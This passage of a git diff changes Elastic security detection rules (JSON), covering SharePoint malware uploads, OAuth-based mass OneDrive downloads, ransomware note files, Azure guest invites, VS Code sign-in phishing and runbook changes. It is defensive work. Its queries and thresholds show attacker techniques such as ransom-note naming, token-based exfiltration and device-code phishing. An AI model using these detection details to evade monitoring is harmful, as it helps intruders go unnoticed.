to suit your specific environment and operational needs.\n\n### Investigating SharePoint Malware File Upload\n\nSharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats.\n\n### Possible investigation steps\n\n- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware.\n- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised.\n- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact.\n- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement.\n- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user.\n- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization.\n\n### False positive analysis\n\n- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash.\n- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy.\n- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. Implement a process to review and whitelist these files if they are from trusted sources.\n- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe.\n- Files with macros or executable content used in legitimate business processes might be detected. Work with relevant departments to identify and exclude these files from alerts after thorough validation.\n\n### Response and remediation\n\n- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site.\n- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response.\n- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location.\n- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. Use advanced threat detection tools to ensure comprehensive coverage.\n- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data.\n- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols.\n- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule.", - "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json deleted file mode 100644 index 71d41ac11f4..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json +++ /dev/null @@ -1,65 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive.", - "false_positives": [ - "Legitimate users may download files from OneDrive using OAuth authentication. Ensure that the downloads are authorized and the user is known before taking action." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "M365 OneDrive Excessive File Downloads with OAuth Token", - "note": "## Triage and Analysis\n\n### Investigating M365 OneDrive Excessive File Downloads with OAuth Token\n\nThis rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique.\n\nThis rule leverages ES|QL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested.\n\n#### Possible Investigation Steps\n\n- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive.\n- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user.\n- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user.\n- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application.\n- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration.\n- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved.\n- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed.\n- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise.\n- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication.\n- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access.\n- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity.\n- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded.\n\n### False Positive Analysis\n\n- Verify if the user regularly downloads large batches of files as part of their job function.\n- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool.\n- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns.\n\n### Response and Remediation\n\n- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions.\n- Reset the affected user's password and require reauthentication to prevent continued unauthorized access.\n- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications.\n- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts.\n- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks.\n- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools.\n", - "query": "FROM logs-o365.audit-*\n| WHERE @timestamp > now() - 14 day\n| WHERE\n event.dataset == \"o365.audit\" and\n\n // filter on files downloaded from OneDrive\n event.provider == \"OneDrive\" and\n event.action == \"FileDownloaded\" and\n\n // filter on OAuth authentication which encompasses device code workflow\n o365.audit.AuthenticationType == \"OAuth\"\n and event.outcome == \"success\"\n// bucket authentication attempts by 1 minute\n| EVAL target_time_window = DATE_TRUNC(1 minutes, @timestamp)\n| KEEP target_time_window, o365.audit.UserId, file.name, source.ip\n\n// aggregate on unique file names and download attempts\n| STATS unique_file_count = count_distinct(file.name), download_attempt_count = count(*) BY target_time_window, o365.audit.UserId, source.ip\n\n// adjustable range for \"excessive\" unique files that were downloaded\n| WHERE unique_file_count >= 25\n", - "references": [ - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" - ], - "risk_score": 47, - "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json index 505838b9601..9ea64e1df40 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json @@ -17,6 +17,12 @@ "references": [ "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json b/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json deleted file mode 100644 index e2e7ecd12f3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json +++ /dev/null @@ -1,136 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a high number (20) of file creation event by the System virtual process from the same host and with same file name containing keywords similar to ransomware note files and all within a short time period.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file-*", - "winlogbeat-*", - "logs-windows.sysmon_operational-*", - "endgame-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Potential Ransomware Behavior - High count of Readme files by System", - "note": "## Triage and analysis\n\n#### Possible investigation steps\n\n- Investigate the content of the readme files.\n- Investigate any file names with unusual extensions.\n- Investigate any incoming network connection to port 445 on this host.\n- Investigate any network logon events to this host.\n- Identify the total number and type of modified files by pid 4.\n- If the number of files is too high and source.ip connecting over SMB is unusual isolate the host and block the used credentials.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Local file modification from a Kernel mode driver.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5\n- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.category:file and host.os.type:windows and process.pid:4 and event.action:creation and\n file.name:(*read*me* or *README* or *lock* or *LOCK* or *how*to* or *HOW*TO* or *@* or *recover* or *RECOVER* or *decrypt* or *DECRYPT* or *restore* or *RESTORE* or *FILES_BACK* or *files_back*)\n", - "references": [ - "https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "windows", - "version": "^2.5.0" - }, - { - "package": "m365_defender", - "version": "^2.22.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.9.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.pid", - "type": "long" - } - ], - "risk_score": 73, - "rule_id": "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.002", - "name": "SMB/Windows Admin Shares", - "reference": "https://attack.mitre.org/techniques/T1021/002/" - } - ] - } - ] - } - ], - "threshold": { - "field": [ - "host.id", - "file.name" - ], - "value": 20 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 208 - }, - "id": "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json deleted file mode 100644 index fb1dd4a047c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability.", - "false_positives": [ - "Guest user invitations may be sent out by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Guest user invitations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure External Guest User Invitation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure External Guest User Invitation\n\nAzure Active Directory (AD) facilitates collaboration by allowing external users to be invited as guest users, enhancing flexibility in cloud environments. However, adversaries may exploit this feature to gain unauthorized access, posing security risks. The detection rule monitors audit logs for successful external user invitations, flagging potential misuse by identifying unusual or unnecessary guest account creations.\n\n### Possible investigation steps\n\n- Review the audit logs to confirm the details of the invitation event, focusing on the operation name \"Invite external user\" and ensuring the event outcome is marked as Success.\n- Identify the inviter by examining the properties of the audit log entry, such as the initiator's user ID or email, to determine if the invitation was expected or authorized.\n- Check the display name and other attributes of the invited guest user to assess if they align with known business needs or if they appear suspicious or unnecessary.\n- Investigate the inviter's recent activity in Azure AD to identify any unusual patterns or deviations from their typical behavior that might indicate compromised credentials.\n- Consult with relevant business units or stakeholders to verify if there was a legitimate business requirement for the guest user invitation and if it aligns with current projects or collaborations.\n- Review the access permissions granted to the guest user to ensure they are limited to the minimum necessary for their role and do not expose sensitive resources.\n\n### False positive analysis\n\n- Invitations for legitimate business partners or vendors may trigger alerts. Regularly review and whitelist known partners to prevent unnecessary alerts.\n- Internal users with dual roles or responsibilities that require external access might be flagged. Maintain a list of such users and update it periodically to exclude them from alerts.\n- Automated systems or applications that require guest access for integration purposes can cause false positives. Identify these systems and configure exceptions in the monitoring rules.\n- Temporary projects or collaborations often involve inviting external users. Document these projects and set expiration dates for guest access to minimize false positives.\n- Frequent invitations from specific departments, such as HR or Marketing, for events or collaborations can be common. Establish a process to verify and approve these invitations to reduce false alerts.\n\n### Response and remediation\n\n- Immediately disable the guest user account identified in the alert to prevent any unauthorized access or activities.\n- Review the audit logs to determine the source and context of the invitation, identifying the user or system that initiated the guest invitation.\n- Notify the security team and relevant stakeholders about the unauthorized guest invitation for further investigation and potential escalation.\n- Conduct a security assessment of the affected Azure AD environment to identify any other unauthorized guest accounts or suspicious activities.\n- Implement conditional access policies to restrict guest user invitations to authorized personnel only, reducing the risk of future unauthorized invitations.\n- Enhance monitoring and alerting for guest user invitations by integrating with a Security Information and Event Management (SIEM) system to ensure timely detection and response.\n- Review and update the organization's Azure AD guest user policies to ensure they align with security best practices and business needs, minimizing unnecessary guest access.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Invite external user\" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json b/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json deleted file mode 100644 index 39d2e9bbbd2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json +++ /dev/null @@ -1,113 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies login activity where the Visual Studio Code `client_id` is used in combination with a resourceDisplayName containing `Microsoft Graph`. This may indicate an attempt to authenticate via Visual Studio Code phishing.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure.activitylogs-*", - "logs-azure.signinlogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Azure Sign-in via Visual Studio Code", - "note": "## Triage and analysis\n\n### Investigating Suspicious Azure Sign-in via Visual Studio Code\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset:(\"azure.signinlogs\" or \"azure.activitylogs\") and \nevent.action : \"Sign-in activity\" and event.outcome:(success or Success) and \n(azure.activitylogs.properties.resourceDisplayName : \"Microsoft Graph\" or azure.signinlogs.properties.resource_display_name : \"Microsoft Graph\") and \n(azure.signinlogs.properties.app_id : \"aebc6443-996d-45c2-90f0-388ff96faa56\" or azure.signinlogs.properties.app_display_name : \"Visual Studio Code\" or \n azure.activitylogs.properties.appDisplayName : \"Visual Studio Code\" or azure.activitylogs.properties.appId : \"aebc6443-996d-45c2-90f0-388ff96faa56\")\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.22.0" - }, - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.appDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.appId", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.resourceDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.app_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.app_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.resource_display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "14fa0285-fe78-4843-ac8e-f4b481f49da9", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 - }, - "id": "14fa0285-fe78-4843-ac8e-f4b481f49da9_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json b/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json deleted file mode 100644 index 4151286dbdf..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json +++ /dev/null @@ -1,64 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Created or Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Runbook Created or Modified\n\nAzure Automation Runbooks are scripts that automate tasks in cloud environments, enhancing operational efficiency. However, adversaries can exploit them to execute unauthorized code and maintain persistence. The detection rule monitors specific Azure activity logs for runbook creation or modification events, flagging successful operations to identify potential misuse. This helps in early detection of malicious activities, ensuring cloud security.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific runbook that was created or modified, focusing on the operation names: \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\", \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\", or \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\".\n- Check the event.outcome field to confirm the operation was successful, as indicated by the values \"Success\" or \"success\".\n- Identify the user or service principal that performed the operation by examining the relevant user identity fields in the activity logs.\n- Investigate the content and purpose of the runbook by reviewing its script or configuration to determine if it contains any unauthorized or suspicious code.\n- Correlate the runbook activity with other security events or alerts in the environment to identify any patterns or related malicious activities.\n- Verify if the runbook changes align with recent legitimate administrative activities or if they were unexpected, which could indicate potential misuse.\n\n### False positive analysis\n\n- Routine updates or maintenance activities by authorized personnel can trigger alerts. To manage this, create exceptions for known maintenance windows or specific user accounts that regularly perform these tasks.\n- Automated deployment processes that include runbook creation or modification might be flagged. Identify and exclude these processes by tagging them with specific identifiers in the logs.\n- Integration with third-party tools that modify runbooks as part of their normal operation can result in false positives. Work with your IT team to whitelist these tools or their associated accounts.\n- Frequent testing or development activities in non-production environments may cause alerts. Consider setting up separate monitoring rules or thresholds for these environments to reduce noise.\n- Scheduled runbook updates for compliance or policy changes can be mistaken for suspicious activity. Document these schedules and adjust the detection rule to account for them, possibly by excluding specific operation names during these times.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Automation account to prevent further unauthorized runbook executions. This can be done by disabling the account or restricting its permissions temporarily.\n- Review the modified or newly created runbooks to identify any malicious code or unauthorized changes. Remove or revert any suspicious modifications to ensure the integrity of the automation scripts.\n- Conduct a thorough audit of recent activities associated with the affected 